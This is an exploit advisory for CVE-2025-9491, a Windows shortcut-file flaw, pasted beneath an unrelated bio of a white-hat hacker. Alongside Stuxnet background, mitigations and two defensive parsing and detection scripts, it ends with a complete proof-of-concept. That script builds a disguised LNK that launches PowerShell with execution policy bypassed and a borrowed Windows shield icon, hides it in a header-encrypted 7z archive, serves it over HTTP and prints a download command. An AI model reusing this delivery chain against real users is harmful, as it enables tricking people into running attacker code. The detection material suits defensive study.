Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.


The Microsoft Windows LNK File UI Misrepresentation Remote Code Execution advisory reproduced below concerns Windows shortcut (.lnk) handling, a component with a long history of abuse. The best-known earlier shortcut bug is CVE-2010-2568 (MS10-046), the one Stuxnet used, and it is worth keeping the two apart.

That 2010 flaw allowed a specially crafted LNK file to execute arbitrary code when its icon was merely rendered, without the shortcut ever being double-clicked.

The shortcut pointed at a Control Panel item and named a DLL as the source of its icon. To draw that icon the Windows Shell loaded the DLL, so an attacker who dropped a malicious DLL next to the LNK got it loaded with no further interaction. The "UI Misrepresentation" title, by contrast, describes the later issue below: there the shortcut must be opened, but Explorer misrepresents what it will run.

When Windows Explorer, or any application that renders shortcut icons, displayed a folder containing such a LNK, it loaded and executed the referenced DLL.

This gave remote code execution over USB drives and network shares: the payload fired as soon as a user browsed to the folder holding the malicious LNK.

Stuxnet used it to spread, including across air-gapped networks, which is what made the flaw effectively wormable. Microsoft fixed it in MS10-046; the UI-misrepresentation issue described next was unpatched when the advisory was written.

# Title: Windows LNK File UI Misrepresentation Remote Code Execution
# Date: 2025-01-04
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (Windows OS component)
# Version: Windows 10, Windows 11, Windows Server 2016/2019/2022
# Tested on: Windows 10 22H2, Windows 11 23H2
# CVE: CVE-2025-9491
# CVSS: 8.8

### Description:
A critical vulnerability exists in Microsoft Windows LNK file handling that allows attackers to create malicious shortcut files that appear legitimate in Windows Explorer while executing arbitrary commands. The vulnerability is a UI misrepresentation flaw where Windows incorrectly displays file properties.

### Exploit:
https://raw.githubusercontent.com/nu11secur1ty/Windows11Exploits/refs/heads/main/2025/CVE-2025-9491/Exploit/CVE-2025-9491.py

### Technical Details:
The vulnerability allows attackers to craft LNK files with:
1. Legitimate-looking icons (document, PDF, Windows Update shield), borrowed by index from a system resource DLL such as shell32.dll or imageres.dll
2. Misleading descriptions ("Security Update", "Important Document"), shown in the tooltip and in the Properties dialog
3. Command execution buried in the arguments field; Properties shows target and arguments together in a single, truncated Target box
4. Window state set to minimized (ShowCommand = 7, SW_SHOWMINNOACTIVE), so the console opens minimized and never takes focus. This is not a hidden window: the ShellLink format only defines 1, 3 and 7, and a fully hidden console has to come from the payload itself (for example PowerShell's -WindowStyle Hidden)

When a user opens the malicious LNK file, Windows Explorer has presented it as a harmless document, but the shortcut actually launches the script host in its target with the arguments above, under the user's privileges. No security warning is displayed as long as the shortcut carries no Mark of the Web, which is why the proof of concept delivers it inside a 7-Zip archive: 7-Zip does not propagate the Zone.Identifier stream to extracted files unless that option is enabled.

### Proof of Concept:
An LNK file can be created that:
- Shows as "Windows Security Update" with a shield icon
- Actually executes: cmd.exe /c powershell -Command "malicious_payload"
- Runs minimized and unfocused (WindowStyle = 7)
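The fields the advisory lists (description, arguments, icon location, ShowCommand) are all stored in the ShellLink header and StringData section, so a gateway or EDR can score them without ever resolving the shortcut. The following is an added example, not part of the advisory or of nu11secur1ty's script: it builds a minimal .lnk from constructed sample values following the MS-SHLLINK layout (header plus StringData only, enough to exercise the parser but not a shortcut Windows would resolve), parses it back, and applies the same checks to any real .lnk read from disk. The triage thresholds and the script-host list are assumptions chosen for the demo.

```python
import re
import struct

# Added example (not from the advisory). Layout follows MS-SHLLINK.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits that decide what follows the 76-byte header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order, each only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
# Assumed list for the demo: binaries that turn a shortcut into a script launcher.
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32")


def build_lnk(name="", relative_path="", working_dir="", arguments="",
              icon_location="", icon_index=0, show_command=1):
    """Constructed sample: ShellLinkHeader + StringData, no IDList or LinkInfo."""
    values = {"name": name, "relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments, "icon_location": icon_location}
    flags = IS_UNICODE
    strings = []
    for flag, key in STRING_FIELDS:
        if values[key]:
            flags |= flag
            strings.append(values[key])
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize,
    # IconIndex (signed), ShowCommand, HotKey, Reserved1/2/3.
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, icon_index, show_command, 0, 0, 0, 0)
    # Each StringData entry: CountCharacters (2 bytes) + UTF-16LE text, no terminator.
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body


def parse_lnk(data):
    """Return the header fields and StringData of a .lnk as a dict."""
    if len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE) or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_command = struct.unpack_from("<iI", data, 56)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) then the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "icon_index": icon_index, "show_command": show_command,
            # the spec says any value other than 1, 3, 7 is treated as SW_SHOWNORMAL
            "show_command_name": SHOW_COMMANDS.get(show_command, "SW_SHOWNORMAL")}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            info[key] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        size = count * 2 if unicode else count
        raw = data[pos:pos + size]
        pos += size
        info[key] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return info


def triage_lnk(info):
    """Findings for the traits the advisory abuses; an empty list means nothing suspicious."""
    findings = []
    launch = (info["relative_path"] + " " + info["arguments"]).lower()
    if any(host in launch for host in SCRIPT_HOSTS):
        findings.append("launches a script host or LOLBin")
    if info["show_command"] == 7:
        findings.append("ShowCommand 7 (SW_SHOWMINNOACTIVE): console starts minimized and unfocused")
    if re.search(r"\s{8,}", info["arguments"]):   # padding pushes the real command out of the Properties box
        findings.append("long whitespace run in arguments")
    icon = info["icon_location"].lower()
    if findings and any(dll in icon for dll in ("shell32.dll", "imageres.dll")):
        findings.append("icon borrowed from a system resource DLL on a script-host shortcut")
    return findings


# Constructed samples: one mirroring the advisory's PoC values, one benign shortcut.
LURE = build_lnk(
    name="Critical Windows Security Update - KB5029244",
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32",
    arguments='-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe"',
    icon_location=r"C:\Windows\System32\shell32.dll", icon_index=78, show_command=7)
BENIGN = build_lnk(name="Notepad", relative_path=r"..\..\Windows\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("lure", LURE), ("benign", BENIGN)):
        info = parse_lnk(blob)
        print(f"{label}: {info['show_command_name']} args={info['arguments'][:40]!r}")
        for finding in triage_lnk(info):
            print("  !", finding)
```

To run it over a real file, `parse_lnk(open(path, "rb").read())` is enough; the IDList and LinkInfo blocks that WScript.Shell-generated shortcuts carry are skipped by size, so the StringData fields land in the same dict.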

### The LNK file can be delivered via:
1. Email attachments
2. Network shares
3. Web downloads
4. USB devices
5. Compressed archives

### Impact:
- Code execution with the user's privileges once the shortcut is opened; the "remote" part is the delivery
- No user warnings or security prompts
- Complete UI deception
- Easy to weaponize

### Mitigation:
1. Do not rely on showing file extensions: Explorer hides the .lnk extension even when "Hide extensions for known file types" is off, because the lnkfile type carries NeverShowExt. The shortcut-arrow overlay and the Target field under Properties are the only visual cues, and Target truncates long command lines
2. Block .LNK file attachments at email gateways, including inside archives; a .7z is not inspected by many gateways and its contents lose the Mark of the Web on extraction
3. Implement application control (AppLocker, WDAC): deny powershell.exe, cmd.exe and the other script hosts to standard users, or at least enforce PowerShell Constrained Language Mode
4. Monitor for hidden process execution: explorer.exe, 7zFM.exe or a mail client spawning a script host, in particular with -WindowStyle Hidden, -ExecutionPolicy Bypass or -EncodedCommand
5. User education about suspicious files
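Mitigation item 4 is the one that catches a lure after the archive has been opened. The following is an added example, not part of the advisory: a small rule that runs over process-creation records and flags a shortcut-launcher (Explorer, the 7-Zip File Manager used in the PoC delivery chain, a mail client) spawning a script host, with the severity raised when the command line carries the switches that silence the console or loosen execution policy. The field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage); the five JSON events and the launcher and switch lists are constructed assumptions for the demo.

```python
import json
import re

# Added example (not from the advisory). Processes that open a shortcut on the
# user's behalf (assumed list): Explorer, 7-Zip File Manager, WinRAR, Outlook.
LAUNCHERS = ("explorer.exe", "7zfm.exe", "winrar.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")

# Switches that hide the window, bypass execution policy or carry an encoded
# payload. PowerShell accepts unambiguous prefixes (-w, -ep, -nop, -enc ...).
EVASIVE = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden"
    r"|-(?:ex|ep|executionpolicy)\s+bypass"
    r"|-(?:e|ec|enc|encodedcommand)\s"
    r"|-nop(?:rofile)?\b"
    r"|-noni(?:nteractive)?\b"
    r"|/c\s",
    re.IGNORECASE)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify(event):
    """Severity for one process-creation event, or None when it does not match."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if image not in SCRIPT_HOSTS:
        return None
    evasive = bool(EVASIVE.search(event.get("CommandLine", "")))
    if parent in LAUNCHERS and evasive:
        return "high"     # user-opened shortcut straight into a silenced script host
    if parent in LAUNCHERS:
        return "medium"   # a shell or archiver spawning a script host is unusual by itself
    if evasive:
        return "low"      # silenced script host from another parent; needs context
    return None


def scan(lines):
    """Parse JSON-lines events and return [(severity, ProcessId, Image)] for matches."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        severity = classify(event)
        if severity:
            hits.append((severity, event.get("ProcessId"), event.get("Image")))
    return hits


# Constructed Sysmon-style events: the PoC chain (7zFM -> powershell with
# -ExecutionPolicy Bypass), an admin's one-liner from Explorer, a hidden
# encoded command from cmd.exe, a benign notepad launch, and an Outlook lure.
SAMPLE_EVENTS = r"""
{"EventID":1,"ProcessId":4120,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Start-Process calc.exe\"","ParentImage":"C:\\Program Files\\7-Zip\\7zFM.exe"}
{"EventID":1,"ProcessId":4188,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -Command Get-Date","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"ProcessId":4210,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -w hidden -enc SQBFAFgA","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventID":1,"ProcessId":4250,"Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe report.txt","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"ProcessId":4302,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -nop -w hidden -c calc","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"}
"""

if __name__ == "__main__":
    for severity, pid, image in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{severity:6} pid={pid} {image}")
```

The parent-process check is what distinguishes a lure from routine scripting: scheduled tasks and management agents launch PowerShell with the same switches all day, but they do not do it as a child of explorer.exe or 7zFM.exe.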

### Vendor Status:
Microsoft has been notified. No patch available as of 2025-01-04.

References:
- CVE-2025-9491
- Microsoft Security Response Center

Note: This information is for defensive purposes only.
Unauthorized testing against systems you don't own is illegal.

--

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>


--- proof of concept ---

```python
#!/usr/bin/python
# nu11secur1ty 2025
import os
import sys
import time
import subprocess
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler

try:
    from win32com.client import Dispatch
except ImportError:
    sys.exit("[-] Install pywin32: pip install pywin32")

ARCHIVE_NAME = 'update.7z'


def get_script_directory():
    # The LNK and the archive are written next to the script (or the frozen exe).
    if getattr(sys, 'frozen', False):
        return os.path.dirname(sys.executable)
    return os.path.dirname(os.path.abspath(__file__))


def get_local_ip():
    # A UDP connect() sends nothing; it only makes the OS pick the outbound interface.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('8.8.8.8', 80))
        ip = s.getsockname()[0]
    except OSError:
        ip = '0.0.0.0'
    finally:
        s.close()
    return ip


def create_malicious_lnk():
    script_dir = get_script_directory()
    lnk_path = os.path.join(script_dir, 'Critical_Update.lnk')

    print("[*] Creating malicious LNK file...")

    try:
        shell = Dispatch('WScript.Shell')
        shortcut = shell.CreateShortCut(lnk_path)

        # The real target is powershell.exe; the payload lives in the arguments
        # (calc.exe stands in for it here).
        shortcut.TargetPath = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"'

        shortcut.WorkingDirectory = r'C:\Windows\System32'
        shortcut.Description = 'Critical Windows Security Update - KB5029244'

        # Borrow a stock icon (index 78) from a system resource DLL so the file
        # looks like a Windows artefact rather than a shortcut to PowerShell.
        icon_paths = [
            r'C:\Windows\System32\shell32.dll',
            r'C:\Windows\System32\imageres.dll',
        ]

        for icon_path in icon_paths:
            if os.path.exists(icon_path):
                shortcut.IconLocation = f'{icon_path},78'
                break

        # WindowStyle 7 = SW_SHOWMINNOACTIVE: the console starts minimized and never
        # takes focus. WScript.Shell has no truly hidden style (valid values: 1, 3, 7).
        shortcut.WindowStyle = 7
        shortcut.save()

        if os.path.exists(lnk_path):
            print(f"[+] LNK created: {lnk_path}")
            return lnk_path
        return None

    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def compress_with_7zip(lnk_path, password=None):
    if not lnk_path or not os.path.exists(lnk_path):
        print("[-] LNK file not found")
        return None

    seven_zip_paths = [
        r'C:\Program Files\7-Zip\7z.exe',
        r'C:\Program Files (x86)\7-Zip\7z.exe',
        '7z.exe',
        '7z',
    ]

    seven_zip = None
    for path in seven_zip_paths:
        try:
            result = subprocess.run([path, '--help'], capture_output=True, text=True)
            if result.returncode == 0:
                seven_zip = path
                break
        except OSError:
            continue

    if not seven_zip:
        print("[-] 7-Zip not found")
        return None

    archive_name = os.path.join(get_script_directory(), ARCHIVE_NAME)

    cmd = [seven_zip, 'a', archive_name, lnk_path]

    if password:
        cmd.append('-p' + password)

    # -mhe=on also encrypts the archive header, so the .lnk name is not
    # visible without the password.
    cmd.extend(['-mx9', '-mhe=on', '-t7z'])

    print("[*] Compressing with 7-Zip...")

    try:
        result = subprocess.run(cmd, capture_output=True, text=True)

        if result.returncode == 0:
            print(f"[+] Archive created: {archive_name}")
            if password:
                print(f"[+] Password: {password}")
            return archive_name
        return None

    except Exception as e:
        print(f"[-] Compression failed: {e}")
        return None


class FileHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path in ('/', '/' + ARCHIVE_NAME):
            # Serve the archive from the script directory, where compress_with_7zip
            # wrote it, rather than from whatever the current working directory is.
            file_path = os.path.join(get_script_directory(), ARCHIVE_NAME)

            if os.path.exists(file_path):
                self.send_response(200)
                self.send_header('Content-type', 'application/x-7z-compressed')
                self.send_header('Content-Disposition', f'attachment; filename="{ARCHIVE_NAME}"')

                with open(file_path, 'rb') as f:
                    content = f.read()

                self.send_header('Content-Length', str(len(content)))
                self.end_headers()
                self.wfile.write(content)
                print(f"[+] CVE-2025-9491: Malicious LNK served to {self.client_address[0]}")
            else:
                self.send_error(404)
        else:
            self.send_error(404)

    def log_message(self, format, *args):
        pass


def start_server(port=8080):
    ip = get_local_ip()

    print(f"[+] Starting server on http://{ip}:{port}")
    print(f"[+] Download URL: http://{ip}:{port}/{ARCHIVE_NAME}")
    print("[+] Server running...")

    server = HTTPServer((ip, port), FileHandler)
    server.serve_forever()


def main():
    print("=" * 60)
    print("CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server")
    print("=" * 60)

    # Create LNK
    lnk_file = create_malicious_lnk()
    if not lnk_file:
        print("[-] Failed to create LNK")
        return

    # Compress with 7-Zip
    compress = input("\n[*] Compress with 7-Zip? (y/n): ").lower().strip()

    if compress == 'y':
        password = input("[*] Password (optional): ").strip() or None

        archive = compress_with_7zip(lnk_file, password)

        if archive:
            print(f"\n[+] Archive ready: {archive}")

            # Start HTTP server in background thread
            server_thread = threading.Thread(target=start_server, daemon=True)
            server_thread.start()

            ip = get_local_ip()
            print(f"\n[+] Server started at http://{ip}:8080")
            print(f"[+] Download: http://{ip}:8080/{ARCHIVE_NAME}")
            print("\n[+] PowerShell download command:")
            print(f'    iwr http://{ip}:8080/{ARCHIVE_NAME} -OutFile {ARCHIVE_NAME}')

            # Keep main thread alive
            try:
                while True:
                    time.sleep(1)
            except KeyboardInterrupt:
                print("\n[*] Shutting down...")
        else:
            print("[-] Compression failed")
            print(f"[*] Use raw LNK: {lnk_file}")
    else:
        print(f"\n[*] Raw LNK file: {lnk_file}")


if __name__ == "__main__":
    main()
```
